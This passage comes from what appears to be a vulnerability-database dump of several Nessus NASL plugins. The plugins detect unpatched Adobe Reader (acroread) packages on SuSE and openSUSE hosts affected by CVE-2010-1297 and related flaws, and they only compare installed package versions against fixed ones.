value:'Adobe Flash Player \"newfunction\" Invalid Pointer Use');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/07/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"acroread_ja-9.3.3-0.4.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:09:48", "description": "Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code. The fixed security issues have been\ntracked as :\n\n - CVE-2010-1297\n\n - CVE-2010-1240\n\n - CVE-2010-1285\n\n - CVE-2010-1295\n\n - CVE-2010-2168\n\n - CVE-2010-2201\n\n - CVE-2010-2202\n\n - CVE-2010-2203\n\n - CVE-2010-2204\n\n - CVE-2010-2205\n\n - CVE-2010-2206\n\n - CVE-2010-2207\n\n - CVE-2010-2208\n\n - CVE-2010-2209\n\n - CVE-2010-2210\n\n - CVE-2010-2211\n\n - CVE-2010-2212", "edition": 23, "published": "2010-12-02T00:00:00", "title": "SuSE 11 / 11.1 Security Update : acroread (SAT Patch Numbers 2637 / 2641)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1295", "CVE-2010-2211", "CVE-2010-2201", "CVE-2010-2212", "CVE-2010-2209", "CVE-2010-2207", "CVE-2010-2203", "CVE-2010-2210", "CVE-2010-2202", "CVE-2010-2205", "CVE-2010-2204", "CVE-2010-1285", "CVE-2010-2206", "CVE-2010-1297", "CVE-2010-1240", "CVE-2010-2208", "CVE-2010-2168"], "modified": "2010-12-02T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:acroread_ja", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_ACROREAD_JA-100702.NASL", "href": "https://www.tenable.com/plugins/nessus/50886", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50886);\n script_version(\"1.34\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-1240\", \"CVE-2010-1285\", \"CVE-2010-1295\", \"CVE-2010-1297\", \"CVE-2010-2168\", \"CVE-2010-2201\", \"CVE-2010-2202\", \"CVE-2010-2203\", \"CVE-2010-2204\", \"CVE-2010-2205\", \"CVE-2010-2206\", \"CVE-2010-2207\", \"CVE-2010-2208\", \"CVE-2010-2209\", \"CVE-2010-2210\", \"CVE-2010-2211\", \"CVE-2010-2212\");\n\n script_name(english:\"SuSE 11 / 11.1 Security Update : acroread (SAT Patch Numbers 2637 / 2641)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code. The fixed security issues have been\ntracked as :\n\n - CVE-2010-1297\n\n - CVE-2010-1240\n\n - CVE-2010-1285\n\n - CVE-2010-1295\n\n - CVE-2010-2168\n\n - CVE-2010-2201\n\n - CVE-2010-2202\n\n - CVE-2010-2203\n\n - CVE-2010-2204\n\n - CVE-2010-2205\n\n - CVE-2010-2206\n\n - CVE-2010-2207\n\n - CVE-2010-2208\n\n - CVE-2010-2209\n\n - CVE-2010-2210\n\n - CVE-2010-2211\n\n - CVE-2010-2212\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=612064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1240.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1285.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1295.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1297.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2168.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2201.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2202.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2203.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2204.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2205.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2206.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2207.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2208.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2209.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2210.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2211.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2212.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Apply SAT patch number 2637 / 2641 as appropriate.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-164\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player \"newfunction\" Invalid Pointer Use');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread_ja\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/07/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/12/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread_ja-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"acroread_ja-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:05:34", "description": "Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code (CVE-2010-1297, CVE-2010-1240,\nCVE-2010-1285, CVE-2010-1295, CVE-2010-2168, CVE-2010-2201,\nCVE-2010-2202, CVE-2010-2203, CVE-2010-2204, CVE-2010-2205,\nCVE-2010-2206, CVE-2010-2207, CVE-2010-2208, CVE-2010-2209,\nCVE-2010-2210, CVE-2010-2211, CVE-2010-2212).", "edition": 24, "published": "2010-07-09T00:00:00", "title": "openSUSE Security Update : acroread (openSUSE-SU-2010:0359-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1295", "CVE-2010-2211", "CVE-2010-2201", "CVE-2010-2212", "CVE-2010-2209", "CVE-2010-2207", "CVE-2010-2203", "CVE-2010-2210", "CVE-2010-2202", "CVE-2010-2205", "CVE-2010-2204", "CVE-2010-1285", "CVE-2010-2206", "CVE-2010-1297", "CVE-2010-1240", "CVE-2010-2208", "CVE-2010-2168"], "modified": "2010-07-09T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:acroread-fonts-ja", "p-cpe:/a:novell:opensuse:acroread-cmaps", "p-cpe:/a:novell:opensuse:acroread", "p-cpe:/a:novell:opensuse:acroread-fonts-ko", "cpe:/o:novell:opensuse:11.2", "p-cpe:/a:novell:opensuse:acroread-fonts-zh_CN", "p-cpe:/a:novell:opensuse:acroread-fonts-zh_TW"], "id": "SUSE_11_2_ACROREAD-100706.NASL", "href": "https://www.tenable.com/plugins/nessus/47694", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update acroread-2664.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(47694);\n script_version(\"1.34\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-1240\", \"CVE-2010-1285\", \"CVE-2010-1295\", \"CVE-2010-1297\", \"CVE-2010-2168\", \"CVE-2010-2201\", \"CVE-2010-2202\", \"CVE-2010-2203\", \"CVE-2010-2204\", \"CVE-2010-2205\", \"CVE-2010-2206\", \"CVE-2010-2207\", \"CVE-2010-2208\", \"CVE-2010-2209\", \"CVE-2010-2210\", \"CVE-2010-2211\", \"CVE-2010-2212\");\n\n script_name(english:\"openSUSE Security Update : acroread (openSUSE-SU-2010:0359-1)\");\n script_summary(english:\"Check for the acroread-2664 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code (CVE-2010-1297, CVE-2010-1240,\nCVE-2010-1285, CVE-2010-1295, CVE-2010-2168, CVE-2010-2201,\nCVE-2010-2202, CVE-2010-2203, CVE-2010-2204, CVE-2010-2205,\nCVE-2010-2206, CVE-2010-2207, CVE-2010-2208, CVE-2010-2209,\nCVE-2010-2210, CVE-2010-2211, CVE-2010-2212).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=612064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-07/msg00005.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-164\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player \"newfunction\" Invalid Pointer Use');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-cmaps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-ko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-zh_CN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-zh_TW\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/07/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/07/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.2\", reference:\"acroread-9.3.3-2.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"acroread-cmaps-9.3.3-2.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"acroread-fonts-ja-9.3.3-2.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"acroread-fonts-ko-9.3.3-2.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"acroread-fonts-zh_CN-9.3.3-2.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"acroread-fonts-zh_TW-9.3.3-2.1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:09:42", "description": "Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code. The fixed security issues have been\ntracked as :\n\n - CVE-2010-1297\n\n - CVE-2010-1240\n\n - CVE-2010-1285\n\n - CVE-2010-1295\n\n - CVE-2010-2168\n\n - CVE-2010-2201\n\n - CVE-2010-2202\n\n - CVE-2010-2203\n\n - CVE-2010-2204\n\n - CVE-2010-2205\n\n - CVE-2010-2206\n\n - CVE-2010-2207\n\n - CVE-2010-2208\n\n - CVE-2010-2209\n\n - CVE-2010-2210\n\n - CVE-2010-2211\n\n - CVE-2010-2212", "edition": 23, "published": "2010-12-02T00:00:00", "title": "SuSE 11 / 11.1 Security Update : acroread (SAT Patch Numbers 2639 / 2640)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1295", "CVE-2010-2211", "CVE-2010-2201", "CVE-2010-2212", "CVE-2010-2209", "CVE-2010-2207", "CVE-2010-2203", "CVE-2010-2210", "CVE-2010-2202", "CVE-2010-2205", "CVE-2010-2204", "CVE-2010-1285", "CVE-2010-2206", "CVE-2010-1297", "CVE-2010-1240", "CVE-2010-2208", "CVE-2010-2168"], "modified": "2010-12-02T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:acroread-fonts-ja", "p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_CN", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:acroread-fonts-ko", "p-cpe:/a:novell:suse_linux:11:acroread-cmaps", "p-cpe:/a:novell:suse_linux:11:acroread", "p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_TW"], "id": "SUSE_11_ACROREAD-100702.NASL", "href": "https://www.tenable.com/plugins/nessus/50882", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50882);\n script_version(\"1.34\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-1240\", \"CVE-2010-1285\", \"CVE-2010-1295\", \"CVE-2010-1297\", \"CVE-2010-2168\", \"CVE-2010-2201\", \"CVE-2010-2202\", \"CVE-2010-2203\", \"CVE-2010-2204\", \"CVE-2010-2205\", \"CVE-2010-2206\", \"CVE-2010-2207\", \"CVE-2010-2208\", \"CVE-2010-2209\", \"CVE-2010-2210\", \"CVE-2010-2211\", \"CVE-2010-2212\");\n\n script_name(english:\"SuSE 11 / 11.1 Security Update : acroread (SAT Patch Numbers 2639 / 2640)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code. The fixed security issues have been\ntracked as :\n\n - CVE-2010-1297\n\n - CVE-2010-1240\n\n - CVE-2010-1285\n\n - CVE-2010-1295\n\n - CVE-2010-2168\n\n - CVE-2010-2201\n\n - CVE-2010-2202\n\n - CVE-2010-2203\n\n - CVE-2010-2204\n\n - CVE-2010-2205\n\n - CVE-2010-2206\n\n - CVE-2010-2207\n\n - CVE-2010-2208\n\n - CVE-2010-2209\n\n - CVE-2010-2210\n\n - CVE-2010-2211\n\n - CVE-2010-2212\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=612064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1240.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1285.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1295.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1297.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2168.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2201.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2202.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2203.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2204.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2205.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2206.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2207.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2208.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2209.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2210.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2211.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2212.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Apply SAT patch number 2639 / 2640 as appropriate.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-164\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player \"newfunction\" Invalid Pointer Use');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-cmaps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-ko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_CN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_TW\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/07/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/12/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread-cmaps-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread-fonts-ja-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread-fonts-ko-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread-fonts-zh_CN-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread-fonts-zh_TW-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"acroread-cmaps-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"acroread-fonts-ja-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"acroread-fonts-ko-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"acroread-fonts-zh_CN-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"acroread-fonts-zh_TW-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"acroread-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"acroread-cmaps-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"acroread-fonts-ja-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"acroread-fonts-ko-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"acroread-fonts-zh_CN-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", 